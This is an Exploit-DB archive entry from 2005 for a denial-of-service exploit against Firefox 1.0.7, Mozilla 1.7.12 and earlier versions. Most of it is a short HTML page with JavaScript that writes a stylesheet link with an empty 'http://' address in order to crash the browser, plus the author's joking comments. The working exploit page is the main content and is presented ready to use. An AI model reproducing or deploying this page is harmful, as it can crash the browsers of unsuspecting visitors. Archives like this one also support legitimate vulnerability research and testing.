Mozilla Firefox <= 1.0.7 Mozilla <= 1.7.12 Denial of Service Exploit

2005-10-17T00:00:00
ID EDB-ID:1257
Type exploitdb
Reporter Kubbo
Modified 2005-10-17T00:00:00

Description

Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit. Dos exploits for multiple platform

                                        
                                            &lt;!-- Tested on Firefox &lt;= 1.0.7
             Mozilla Browser &lt;= 1.7.12 
                         /str0ke --&gt;

&lt;!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. --&gt;

&lt;html&gt;
	&lt;script language="JavaScript"&gt;
		document.write('&lt;link rel="stylesheet" href="http://"&gt;');
	&lt;/script&gt;
&lt;/html&gt;

&lt;!-- Affects Firefox 1.0.7 and below. Adaras öron är farliga. --&gt;

# milw0rm.com [2005-10-17]